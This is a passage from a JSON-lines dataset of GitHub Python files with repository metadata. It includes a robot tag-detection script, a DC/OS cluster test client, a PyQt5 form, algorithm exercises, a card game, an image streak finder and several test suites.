tags:\n\t\t\t\t\ttags.append(ids[0][0])\n\t\t\t\t\tprint('enemy')\n\t\t\t\t\tprint(ids[0][0])\n\t\t\t\t\t#enemy indicator led on\n\t\t\t\t\t#also sends pin signal to propeller to\n\t\t\t\t\t#execute knock off enemies routine on propeller\n\t\t\t\t\tGPIO.output(enemy_pin,1)\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tGPIO.output(enemy_pin,0)\n\t\t\t\tif ids[0][0] < 10 and ids[0][0] not in tags:\n\t\t\t\t\ttags.append(ids[0][0])\n\t\t\t\t\tprint('friendly')\n\t\t\t\t\t#friend indicator led on\n\t\t\t\t\tGPIO.output(friend_pin,1)\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tGPIO.output(friend_pin,0)\n\t\t\telse:\n\t\t\t\tprint('too far')\n\t\telse:\n\t\t\tprint('no tags')\n\t\t\tGPIO.output(friend_pin,0)\n\t\t\tGPIO.output(enemy_pin,0)\n\t\t\t\n\t#clean up all created objects\n\t#cv2.imwrite('/home/pi/testimage.jpg', image)\n\tcv2.destroyAllWindows()\n\tcam.release()\n\tcv2.destroyAllWindows()\t\n\tGPIO.output(friend_pin,0)\n\tGPIO.output(enemy_pin,0)\n\tGPIO.cleanup()\n\tprint(tags)\n\t\n#check indicator leds work properly\ndef check_leds():\n\tGPIO.setmode(GPIO.BCM)\n\tGPIO.setup(enemy_pin,GPIO.OUT)\n\tGPIO.setup(friend_pin,GPIO.OUT)\n\n\tGPIO.output(enemy_pin,1)\n\tGPIO.output(friend_pin,1)\n\ttime.sleep(1)\n\tGPIO.output(enemy_pin,0)\n\tGPIO.output(friend_pin,0)\n\t\n\tGPIO.cleanup()\n","repo_name":"Ravichandran-Arunagiri/Autonomous_Grid_Navigating_Robot","sub_path":"cam_tagdetection.py","file_name":"cam_tagdetection.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19792722696","text":"import copy\nimport logging\nimport os\nfrom urllib.parse import urlparse\n\nimport dns.exception\nimport dns.resolver\nimport requests\nimport retrying\n\nimport test_util.helpers\nimport test_util.marathon\n\nADMINROUTER_PORT_MAPPING = {\n 'master': {'http': 80, 'https': 443},\n 'agent': {'http': 61001, 'https': 61002}}\n\n\ndef get_args_from_env():\n \"\"\"Does basic sanity checks and returns args converted\n from strings to python data types\n \"\"\"\n assert 'DCOS_DNS_ADDRESS' in os.environ\n assert 'MASTER_HOSTS' in os.environ\n assert 'PUBLIC_MASTER_HOSTS' in os.environ\n assert 'SLAVE_HOSTS' in os.environ\n assert 'PUBLIC_SLAVE_HOSTS' in os.environ\n assert 'DNS_SEARCH' in os.environ\n assert 'DCOS_PROVIDER' in os.environ\n\n # must be true or false (prevents misspellings)\n assert os.environ['DNS_SEARCH'] in ['true', 'false']\n\n assert os.environ['DCOS_PROVIDER'] in ['onprem', 'aws', 'azure']\n\n return {\n 'dcos_url': os.environ['DCOS_DNS_ADDRESS'],\n 'masters': os.environ['MASTER_HOSTS'].split(','),\n 'public_masters': os.environ['PUBLIC_MASTER_HOSTS'].split(','),\n 'slaves': os.environ['SLAVE_HOSTS'].split(','),\n 'public_slaves': os.environ['PUBLIC_SLAVE_HOSTS'].split(','),\n 'dns_search_set': os.environ['DNS_SEARCH'] == 'true',\n 'provider': os.environ['DCOS_PROVIDER'],\n 'auth_enabled': os.getenv('DCOS_AUTH_ENABLED', 'true') == 'true',\n 'default_os_user': os.getenv('DCOS_DEFAULT_OS_USER', 'root'),\n 'ca_cert_path': os.getenv('DCOS_CA_CERT_PATH', None)}\n\n\nclass ClusterApi(test_util.helpers.ApiClient):\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_marathon_up(self):\n r = self.get('/marathon/ui/')\n # resp_code >= 500 -> backend is still down probably\n if r.status_code < 500:\n logging.info(\"Marathon is probably up\")\n return True\n else:\n msg = \"Waiting for Marathon, resp code is: {}\"\n logging.info(msg.format(r.status_code))\n return False\n\n @retrying.retry(wait_fixed=1000)\n def _wait_for_zk_quorum(self):\n \"\"\"Queries exhibitor to ensure all master ZKs have joined\n \"\"\"\n r = self.get('/exhibitor/exhibitor/v1/cluster/status')\n if not r.ok:\n logging.warning('Exhibitor status not available')\n r.raise_for_status()\n status = r.json()\n logging.info('Exhibitor cluster status: {}'.format(status))\n zk_nodes = sorted([n['hostname'] for n in status])\n assert zk_nodes == self.masters, 'ZooKeeper has not formed the expected quorum'\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_slaves_to_join(self):\n r = self.get('/mesos/master/slaves')\n if r.status_code != 200:\n msg = \"Mesos master returned status code {} != 200 \"\n msg += \"continuing to wait...\"\n logging.info(msg.format(r.status_code))\n return False\n data = r.json()\n # Check that there are all the slaves the test knows about. They are all\n # needed to pass the test.\n num_slaves = len(data['slaves'])\n if num_slaves >= len(self.all_slaves):\n msg = \"Sufficient ({} >= {}) number of slaves have joined the cluster\"\n logging.info(msg.format(num_slaves, self.all_slaves))\n return True\n else:\n msg = \"Current number of slaves: {} < {}, continuing to wait...\"\n logging.info(msg.format(num_slaves, self.all_slaves))\n return False\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_dcos_history_up(self):\n r = self.get('/dcos-history-service/ping')\n # resp_code >= 500 -> backend is still down probably\n if r.status_code <= 500:\n logging.info(\"DC/OS History is probably up\")\n return True\n else:\n msg = \"Waiting for DC/OS History, resp code is: {}\"\n logging.info(msg.format(r.status_code))\n return False\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_dcos_history_data(self):\n ro = self.get('/dcos-history-service/history/last')\n # resp_code >= 500 -> backend is still down probably\n if ro.status_code <= 500:\n logging.info(\"DC/OS History is probably getting data\")\n json = ro.json()\n assert len(json[\"slaves\"]) == len(self.all_slaves)\n return True\n else:\n msg = \"Waiting for DC/OS History, resp code is: {}\"\n logging.info(msg.format(ro.status_code))\n return False\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_leader_election(self):\n mesos_resolver = dns.resolver.Resolver()\n mesos_resolver.nameservers = self.public_masters\n mesos_resolver.port = 61053\n try:\n # Yeah, we can also put it in retry_on_exception, but\n # this way we will loose debug messages\n mesos_resolver.query('leader.mesos', 'A')\n except dns.exception.DNSException as e:\n msg = \"Cannot resolve leader.mesos, error string: '{}', continuing to wait\"\n logging.info(msg.format(e))\n return False\n else:\n logging.info(\"leader.mesos dns entry is UP!\")\n return True\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_adminrouter_up(self):\n try:\n # Yeah, we can also put it in retry_on_exception, but\n # this way we will loose debug messages\n self.get('/')\n except requests.ConnectionError as e:\n msg = \"Cannot connect to nginx, error string: '{}', continuing to wait\"\n logging.info(msg.format(e))\n return False\n else:\n logging.info(\"Nginx is UP!\")\n return True\n\n # Retry if returncode is False, do not retry on exceptions.\n @retrying.retry(wait_fixed=2000,\n retry_on_result=lambda r: r is False,\n retry_on_exception=lambda _: False)\n def _wait_for_srouter_slaves_endpoints(self):\n # Get currently known agents. This request is served straight from\n # Mesos (no AdminRouter-based caching is involved).\n r = self.get('/mesos/master/slaves')\n assert r.status_code == 200\n\n data = r.json()\n # only check against the slaves we expect to be in the cluster\n # so we can check that cluster has returned after a failure\n # in which case will will have new slaves and dead slaves\n slaves_ids = sorted(x['id'] for x in data['slaves'] if x['hostname'] in self.all_slaves)\n\n for slave_id in slaves_ids:\n # AdminRouter's slave endpoint internally uses cached Mesos\n # state data. That is, slave IDs of just recently joined\n # slaves can be unknown here. For those, this endpoint\n # returns a 404. Retry in this case, until this endpoint\n # is confirmed to work for all known agents.\n uri = '/slave/{}/slave%281%29/state.json'.format(slave_id)\n r = self.get(uri)\n if r.status_code == 404:\n return False\n assert r.status_code == 200\n data = r.json()\n assert \"id\" in data\n assert data[\"id\"] == slave_id\n\n @retrying.retry(wait_fixed=2000,\n retry_on_result=lambda r: r is False,\n retry_on_exception=lambda _: False)\n def _wait_for_metronome(self):\n r = self.get('/service/metronome/v1/jobs')\n # 500 and 504 are the expected behavior of a service\n # backend that is not up and running.\n if r.status_code == 500 or r.status_code == 504:\n logging.info(\"Metronome gateway timeout, continue waiting for backend...\")\n return False\n assert r.status_code == 200\n\n def wait_for_dcos(self):\n self._wait_for_leader_election()\n self._wait_for_adminrouter_up()\n if self.auth_enabled and self.web_auth_default_user:\n self._authenticate_default_user()\n self._wait_for_marathon_up()\n self._wait_for_zk_quorum()\n self._wait_for_slaves_to_join()\n self._wait_for_dcos_history_up()\n self._wait_for_srouter_slaves_endpoints()\n self._wait_for_dcos_history_data()\n self._wait_for_metronome()\n\n @retrying.retry(wait_fixed=2000, stop_max_delay=120 * 1000)\n def _authenticate_default_user(self):\n \"\"\"retry default auth user because in some deployments,\n the auth endpoint might not be routable immediately\n after adminrouter is up. DcosUser.authenticate()\n will raise exception if authorization fails\n \"\"\"\n self.web_auth_default_user.authenticate(self)\n self.default_headers.update(self.web_auth_default_user.auth_header)\n\n def __init__(self, dcos_url, masters, public_masters, slaves, public_slaves,\n dns_search_set, provider, auth_enabled, default_os_user,\n web_auth_default_user=None, ca_cert_path=None):\n \"\"\"Proxy class for DC/OS clusters.\n\n Args:\n dcos_url: address for the DC/OS web UI.\n masters: list of Mesos master advertised IP addresses.\n public_masters: list of Mesos master IP addresses routable from\n the local host.\n slaves: list of Mesos slave/agent advertised IP addresses.\n dns_search_set: string indicating that a DNS search domain is\n configured if its value is \"true\".\n provider: onprem, azure, or aws\n auth_enabled: True or False\n default_os_user: default user that marathon/metronome will launch tasks under\n web_auth_default_user: if auth_enabled, use this user's auth for all requests\n Note: user must be authenticated explicitly or call self.wait_for_dcos()\n ca_cert_path: (str) optional path point to the CA cert to make requests against\n \"\"\"\n # URL must include scheme\n assert dcos_url.startswith('http')\n parse_result = urlparse(dcos_url)\n self.scheme = parse_result.scheme\n self.dns_host = parse_result.netloc.split(':')[0]\n\n # Make URL never end with /\n self.dcos_url = dcos_url.rstrip('/')\n\n super().__init__(\n default_host_url=self.dcos_url,\n api_base=None,\n ca_cert_path=ca_cert_path,\n get_node_url=self.get_node_url)\n self.masters = sorted(masters)\n self.public_masters = sorted(public_masters)\n self.slaves = sorted(slaves)\n self.public_slaves = sorted(public_slaves)\n self.all_slaves = sorted(slaves + public_slaves)\n self.zk_hostports = ','.join(':'.join([host, '2181']) for host in self.public_masters)\n self.dns_search_set = dns_search_set\n self.provider = provider\n self.auth_enabled = auth_enabled\n self.default_os_user = default_os_user\n self.web_auth_default_user = web_auth_default_user\n\n assert len(self.masters) == len(self.public_masters)\n\n def get_user_session(self, user):\n \"\"\"Returns a copy of self with auth headers set for user\n \"\"\"\n new_session = copy.deepcopy(self)\n # purge old auth headers\n if self.web_auth_default_user is not None:\n for k in self.web_auth_default_user.auth_header.keys():\n if k in new_session.default_headers:\n del new_session.default_headers[k]\n # if user is given then auth and update the headers\n new_session.web_auth_default_user = user\n if user is not None:\n new_session._authenticate_default_user()\n return new_session\n\n def get_node_url(self, node, port=None):\n \"\"\"\n Args:\n node: (str) the hostname of the node to be requested from, if node=None,\n then public cluster address (see environment DCOS_DNS_ADDRESS)\n port: (int) port to be requested at. If port=None, the default port\n for that given node type will be used\n Returns:\n fully-qualified URL string for this API\n \"\"\"\n if node in self.masters:\n role = 'master'\n elif node in self.all_slaves:\n role = 'agent'\n else:\n raise Exception('Node {} is not recognized within the DC/OS cluster'.format(node))\n if port is None:\n port = ADMINROUTER_PORT_MAPPING[role][self.scheme]\n # do not explicitly declare default ports\n if (port == 80 and self.scheme == 'http') or (port == 443 and self.scheme == 'https'):\n netloc = node\n else:\n netloc = '{}:{}'.format(node, port)\n return '{}://{}'.format(self.scheme, netloc)\n\n @property\n def marathon(self):\n marathon_client = test_util.marathon.Marathon(\n default_host_url=self.dcos_url,\n default_os_user=self.default_os_user,\n default_headers=self.default_headers,\n ca_cert_path=self.ca_cert_path,\n get_node_url=self.get_node_url)\n return marathon_client\n\n @property\n def metronome(self):\n return self.get_client('/service/metronome/v1')\n\n @property\n def logs(self):\n return self.get_client('/system/v1/logs')\n\n def metronome_one_off(self, job_definition, timeout=300, ignore_failures=False):\n \"\"\"Run a job on metronome and block until it returns success\n \"\"\"\n job_id = job_definition['id']\n\n @retrying.retry(wait_fixed=2000, stop_max_delay=timeout * 1000,\n retry_on_result=lambda ret: not ret,\n retry_on_exception=lambda x: False)\n def wait_for_completion():\n r = self.metronome.get('jobs/' + job_id, params={'embed': 'history'})\n r.raise_for_status()\n out = r.json()\n if not ignore_failures and (out['history']['failureCount'] != 0):\n raise Exception('Metronome job failed!: ' + repr(out))\n if out['history']['successCount'] != 1:\n logging.info('Waiting for one-off to finish. Status: ' + repr(out))\n return False\n logging.info('Metronome one-off successful')\n return True\n logging.info('Creating metronome job: ' + repr(job_definition))\n r = self.metronome.post('jobs', json=job_definition)\n r.raise_for_status()\n logging.info('Starting metronome job')\n r = self.metronome.post('jobs/{}/runs'.format(job_id))\n r.raise_for_status()\n wait_for_completion()\n logging.info('Deleting metronome one-off')\n r = self.metronome.delete('jobs/' + job_id)\n r.raise_for_status()\n","repo_name":"samchiang/DC-OS","sub_path":"test_util/cluster_api.py","file_name":"cluster_api.py","file_ext":"py","file_size_in_byte":15440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26261059034","text":"\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton, QToolTip, QLabel, QLineEdit\n\nclass Teste (QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.topo = 200\n self.esquerda = 120\n self.largura = 700\n self.altura = 600\n self.titulo = \"Primeiro teste\"\n\n self.caixa_texto = QLineEdit(self) # caixa de texto\n self.caixa_texto.move(260, 20)\n self.caixa_texto.resize(220, 36)\n\n self.caixa_texto1 = QLineEdit(self) # caixa de texto1\n self.caixa_texto1.move(260, 60)\n self.caixa_texto1.resize(220, 36)\n\n '''botao1 = QPushButton('Botao1', self)\n botao1.move(80, 200)\n botao1.resize(140, 64)\n botao1.setStyleSheet('QPushButton {font:bold;font-size:20px}')\n botao1.clicked.connect(self.botao1_click)'''\n\n botao_caixa = QPushButton('Mostar a soma ', self)\n botao_caixa.move(520, 460)\n botao_caixa.resize(160, 64)\n botao_caixa.setStyleSheet('QPushButton {font:bold;font-size:20px}')\n botao_caixa.clicked.connect(self.mostra_soma)\n\n '''botao2 = QPushButton('Botao2', self)\n botao2.move(280, 200)\n botao2.resize(140, 64)\n botao2.setStyleSheet('QPushButton {font:bold;font-size:20px}')\n botao2.clicked.connect(self.botao2_click)'''\n self.label_1 = QLabel(self)\n self.label_1.setText(\"Primeiro números: \")\n self.label_1.move(12, 24)\n self.label_1.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_1.resize(400, 25)\n\n self.label_2 = QLabel(self)\n self.label_2.move(12, 60)\n self.label_2.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_2.resize(400, 30)\n self.label_2.setText(\"Segundo número: \")\n\n self.label_caixa = QLabel(self)\n self.label_caixa.move(290, 300)\n self.label_caixa.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_caixa.resize(360, 45)\n self.label_caixa.setText(\"A soma dos numeros é: \")\n\n self.label_caixa = QLabel(self)\n self.label_caixa.move(586, 300)\n self.label_caixa.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_caixa.resize(360, 45)\n self.label_caixa.setText(\"\")\n\n self.carregarteste()\n\n def carregarteste(self):\n self.setGeometry(self.esquerda, self.topo, self.largura, self.altura)\n self.setWindowTitle(self.titulo)\n self.show()\n\n '''def botao1_click(self):\n print('O botao 1 foi clicado')\n self.label_1.setText(\"O botao 1 foi clicado\")'''\n\n def mostra_soma(self):\n primeiro_n = int(self.caixa_texto.text())\n segundo_n = int(self.caixa_texto1.text())\n soma = str(primeiro_n + segundo_n)\n self.label_caixa.setText(soma)\n #self.label_caixa.setText(conteudo2)\n print(primeiro_n)\n print(segundo_n)\n print(soma)\n\n '''def botao2_click(self):\n print('O botao 2 foi clicado')\n self.label_1.setText(\"O botao 2 foi clicado\")'''\n\naplicacao = QApplication(sys.argv)\nt = Teste()\nsys.exit(aplicacao.exec_())","repo_name":"Miguel-ectil/Meus-estudos","sub_path":"Estudo_Python/Testes, exemplos e aprendisagem/pyqt5.py","file_name":"pyqt5.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75190282404","text":"'''\n You are given N counters, initially set to 0, and you have two possible operations on them:\n increase(X) ? counter X is increased by 1,\n max counter ? all counters are set to the maximum value of any counter.\n A non-empty array A of M integers is given. This array represents consecutive operations:\n\n if A[K] = X, such that 1 ? X ? N, then operation K is increase(X),\n if A[K] = N + 1 then operation K is max counter.\n For example, given integer N = 5 and array A such that:\n\n A[0] = 3\n A[1] = 4\n A[2] = 4\n A[3] = 6\n A[4] = 1\n A[5] = 4\n A[6] = 4\n the values of the counters after each consecutive operation will be:\n\n (0, 0, 1, 0, 0)\n (0, 0, 1, 1, 0)\n (0, 0, 1, 2, 0)\n (2, 2, 2, 2, 2)\n (3, 2, 2, 2, 2)\n (3, 2, 2, 3, 2)\n (3, 2, 2, 4, 2)\n \n https://app.codility.com/demo/results/trainingBQGKND-C77/\n'''\ndef solution(N, A):\n aLen = len(A)\n ansList = [0] * (N + 1)\n ansLen = len(ansList)\n maxValue = 0\n offset = 0\n for i in range(aLen):\n if A[i] == (N + 1):\n offset = maxValue\n \n if A[i] >= 1 and A[i] <= N:\n # offset byl wywyolany ansList[A[i]] += 1\n ansList[A[i]] = max( offset+1, ansList[A[i]]+1 )\n if maxValue < ansList[A[i]]:\n maxValue = ansList[A[i]]\n \n for i in range(1,ansLen):\n if ansList[i] < offset:\n ansList[i] = offset\n \n return ansList[1:]\n \n\nA = [3,4,4,6,1,4,4]\nN = 5\nprint(solution(N, A))","repo_name":"dawidbo/algorithms","sub_path":"Codility/maxCounters.py","file_name":"maxCounters.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40944577459","text":"def pascal(nums_rows):\r\n # nums_rows is the total no of row in the pascal triangle\r\n # creating a pascal triangle with 0 initially\r\n tri = [[0]*k for k in range(1,nums_rows+1)]\r\n\r\n # traversing the tri\r\n for row in range(0,nums_rows):\r\n for col in range(0,row + 1):\r\n if col == 0 or col == (row):\r\n tri[row][col] = 1\r\n else:\r\n tri[row][col] = tri[row-1][col-1] + tri[row-1][col]\r\n return tri\r\n\r\n\r\n# checking the test case\r\nnum_rows = 5\r\nans = pascal(num_rows)\r\nfor row in range(0,num_rows):\r\n for col in range(0,row+1):\r\n print(ans[row][col],end=' ')\r\n print('\\n')\r\n","repo_name":"Ranjit007ai/InterviewBit-ArrayBasedSolutions","sub_path":"Array_based_problems/pascal_triangle/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41879072698","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nN,M,S,T=list(map(int, input().split()))\nS-=1\nT-=1\ngraph_money = [[]*N for _ in range(N)]\ngraph_snuuke = [[] * N for _ in range(N)]\nfor _ in range(M):\n u,v,a,b = list(map(int, input().split()))\n u-=1\n v-=1\n graph_money[u].append([a,v])\n graph_money[v].append([a,u])\n graph_snuuke[u].append([b, v])\n graph_snuuke[v].append([b, u])\nsum_money = [float('inf')]*N\nsum_snuuku = [float('inf')] * N\nh = [[0,S]]\nsum_money[S]=0\nsum_snuuku[T]=0\nheapq.heapify(h)\ncnt = 0\nwhile len(h) > 0:\n cnt += 1\n if cnt == N:break\n m,t = heapq.heappop(h)\n for money,e in graph_money[t]:\n cost = m + money\n if sum_money[e] <= cost:continue\n sum_money[e]=cost\n heapq.heappush(h, [cost, e])\n\nh = [[0,T]]\nheapq.heapify(h)\ncnt = 0\nwhile len(h) > 0:\n cnt += 1\n if cnt == N:break\n s,t = heapq.heappop(h)\n for snuuku,e in graph_snuuke[t]:\n cost = s + snuuku\n if sum_snuuku[e] <= cost:continue\n sum_snuuku[e]=cost\n heapq.heappush(h, [cost, e])\nleft = 10**15\nmin_cost = float('inf')\nans = []\nfor i in reversed(range(N)):\n min_cost = min(min_cost, sum_money[i]+sum_snuuku[i])\n ans.append(left - min_cost)\nans.reverse()\nprint(*ans, sep='\\n')","repo_name":"tokumaru-y/competitive_program_python","sub_path":"antBook/first_problem/2/5/2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15572258049","text":"from game_war.player import Player\nfrom game_war.desk import Desk\nfrom game_war.card import Card\n\nplayer_one = Player(\"One\")\nplayer_two = Player(\"Two\")\n\n\nnew_desk = Desk()\nnew_desk.shuffle()\n\n\ngame_on = True\n\nround_num = 0\n\n\nfor x in range(26):\n player_one.add_cards(new_desk.deal_one())\n player_two.add_cards(new_desk.deal_one())\n\nprint(player_one.remove_one())\n\nwhile game_on:\n round_num += 1\n\n # Game over\n if len(player_one.all_card) == 0 or len(player_two.all_card) == 0:\n # Who win ?\n player_win = \"One\" if len(player_two.all_card) == 0 else \"Two\"\n Player_lose = \"One\" if len(player_one.all_card) == 0 else \"Two\"\n\n print(f\"Player {Player_lose}, out of cards! Player {player_win} Wins!\")\n break\n\n print(f\"Round {round_num}\")\n print(\"Fight\")\n # Player a new round\n # Show card to fight\n player_one_cards = []\n player_one_cards.append(player_one.remove_one())\n\n player_two_cards = []\n player_two_cards.append(player_two.remove_one())\n\n at_war = True\n\n while at_war:\n if player_one_cards[-1].value > player_two_cards[-1].value:\n # player 1 win round, Player One get all card was bet\n player_one.add_cards(player_one_cards)\n player_one.add_cards(player_two_cards)\n\n at_war = False\n \n elif player_one_cards[-1].value < player_two_cards[-1].value:\n # player 2 win round, Player One get all card was bet\n player_two.add_cards(player_one_cards)\n player_two.add_cards(player_two_cards)\n\n at_war = False\n else:\n print(\"WAR!\")\n\n if len(player_one.all_card) < 5:\n print(\"Player One unable to declare war\")\n print(\"PLAYER TWO WIN!\")\n game_on = False\n break\n elif len(player_two.all_card) < 5:\n print(\"Player TWO unable to declare war\")\n print(\"PLAYER ONE WIN!\")\n game_on = False\n break\n else:\n for num in range(5):\n player_one_cards.append(player_one.remove_one())\n player_two_cards.append(player_two.remove_one())\n break\n \n\n\n\n","repo_name":"phibang123/python_game_war","sub_path":"game_setup.py","file_name":"game_setup.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1884553504","text":"from load_tagcam import load_tagcam\nimport numpy as np\nfrom skimage.feature import canny\nfrom skimage.transform import probabilistic_hough_line\nfrom matplotlib import pyplot as plt\n\n__doc__ = \"\"\"\nIdentify potential streaks/particles in a set of images. The NavCam2 day 100 images exhibit a large number\nof streaks in the images and there is now a push to figure out the cause.\n\nPre-process the images with a canny edge detector and use a hough transformation to identify lines in the images.\n\"\"\"\n\n\ndef plot_lines(lines):\n for line in lines:\n (x0, y0), (x1, y1) = line\n plt.plot((x0, x1), (y0, y1))\n\n\ndef distance(point_one, point_two):\n \"\"\"The distance between two points\"\"\"\n x1, y1 = point_one\n x2, y2 = point_two\n return np.sqrt((x2 - x1)**2 + (y2-y1)**2)\n\n\ndef count_streaks(lines, dist=25):\n \"\"\" The hough transformation typically identifies multiple lines for a single streak. To count the individual\n streaks, only count lines that are a given distance from one another.\n\n\n :param lines: The lines identified by the hough transformation in format ((x0, y0), (x1, y1))\n :param dist: Distance in pixels\n :return: The number of streaks\n \"\"\"\n starting_points = [l[0] for l in lines]\n\n # First line will always be unique\n unique_points = [starting_points[0]]\n\n for sp in starting_points:\n unique = True\n\n for point in unique_points:\n if distance(sp, point) < dist:\n unique = False\n\n if unique:\n unique_points.append(sp)\n\n return len(unique_points)\n\n\ndef find_streaks(image):\n \"\"\" Identify potential streaks/particles in a set of images using canny edge detector and probabilistic hough lines\n\n :param image: The image to look for the streaks in\n :return: The number of streaks identified in the image\n \"\"\"\n # No sigma because if you smooth the image you'll lose the dim streaks\n edges = canny(image, sigma=0)\n\n lines = probabilistic_hough_line(edges, threshold=1, line_length=6,\n line_gap=1)\n\n if lines:\n # Plot the streaks on the image\n # plt.imshow(image, cmap='gray', interpolation='none')\n # plot_lines(lines)\n # plt.show()\n\n return count_streaks(lines)\n\n return 0\n\n# Example usage\nif __name__ == \"__main__\":\n\n directory = 'C:/Users/kalkiek/Desktop/repos/data/navcam2/DAY100/'\n\n navcam = load_tagcam([directory])\n\n for index, im in enumerate(navcam.images):\n streak_count = find_streaks(im)\n print(\"Index {0}: Streak Count {1}\".format(index, streak_count))\n","repo_name":"KenanA95/orex_scripts","sub_path":"find_streaks.py","file_name":"find_streaks.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11462131554","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom mediasoft.tests.factories import CityFactory\n\n\nclass CityTests(APITestCase):\n def test_view_cities(self):\n cities = CityFactory.create_batch(5)\n response = self.client.get(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n results = response.data.get(\"results\")\n results_list = [result[\"name\"] for result in results]\n for city in cities:\n self.assertIn(city.name, results_list)\n\n def test_view_cities_with_other_methods(self):\n response = self.client.post(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n response = self.client.put(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n response = self.client.delete(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n","repo_name":"ajib6ept/mediasoft-httpservice","sub_path":"mediasoft/tests/test_city.py","file_name":"test_city.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32986623851","text":"import cartography.intel.crxcavator.crxcavator\nimport tests.data.crxcavator.crxcavator\n\n\nTEST_UPDATE_TAG = 123456789\n\n\ndef _ensure_local_neo4j_has_test_extensions_data(neo4j_session):\n cartography.intel.crxcavator.crxcavator.load_extensions(\n tests.data.crxcavator.crxcavator.TRANSFORMED_EXTENSIONS_DATA,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n\ndef _ensure_local_neo4j_has_test_user_extensions_data(neo4j_session):\n cartography.intel.crxcavator.crxcavator.load_user_extensions(\n tests.data.crxcavator.crxcavator.TRANSFORMED_USER_DATA,\n tests.data.crxcavator.crxcavator.TRANSFORMED_USER_EXTENSION_DATA,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n\ndef test_transform_and_load_extensions(neo4j_session):\n \"\"\"\n Test that we can correctly transform and load ChromeExtension nodes to Neo4j.\n \"\"\"\n extension_res = tests.data.crxcavator.crxcavator.REPORT_RESPONSE\n extension_list = cartography.intel.crxcavator.crxcavator.transform_extensions(extension_res)\n cartography.intel.crxcavator.crxcavator.load_extensions(\n extension_list,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n query = \"\"\"\n MATCH(ext:ChromeExtension{id:$ExtensionId})\n RETURN\n ext.id,\n ext.extension_id,\n ext.version,\n ext.risk_total,\n ext.risk_metadata,\n ext.risk_permissions_score,\n ext.risk_webstore_score,\n ext.risk_csp_score,\n ext.risk_optional_permissions_score,\n ext.risk_extcalls_score,\n ext.risk_vuln_score,\n ext.address,\n ext.email,\n ext.icon,\n ext.crxcavator_last_updated,\n ext.name,\n ext.offered_by,\n ext.permissions_warnings,\n ext.privacy_policy,\n ext.rating,\n ext.rating_users,\n ext.short_description,\n ext.size,\n ext.support_site,\n ext.users,\n ext.website,\n ext.type,\n ext.price,\n ext.report_link\n \"\"\"\n expected_extension_id = 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc|1.0'\n nodes = neo4j_session.run(\n query,\n ExtensionId=expected_extension_id,\n )\n actual_nodes = list(\n (\n n['ext.id'],\n n['ext.extension_id'],\n n['ext.version'],\n n['ext.risk_total'],\n n['ext.risk_metadata'],\n n['ext.risk_permissions_score'],\n n['ext.risk_webstore_score'],\n n['ext.risk_csp_score'],\n n['ext.risk_optional_permissions_score'],\n n['ext.risk_extcalls_score'],\n n['ext.risk_vuln_score'],\n n['ext.address'],\n n['ext.email'],\n n['ext.icon'],\n n['ext.crxcavator_last_updated'],\n n['ext.name'],\n n['ext.offered_by'],\n n['ext.permissions_warnings'],\n n['ext.privacy_policy'],\n n['ext.rating'],\n n['ext.rating_users'],\n n['ext.short_description'],\n n['ext.size'],\n n['ext.support_site'],\n n['ext.users'],\n n['ext.website'],\n n['ext.type'],\n n['ext.price'],\n n['ext.report_link'],\n ) for n in nodes\n )\n expected_nodes = list([\n (\n expected_extension_id,\n 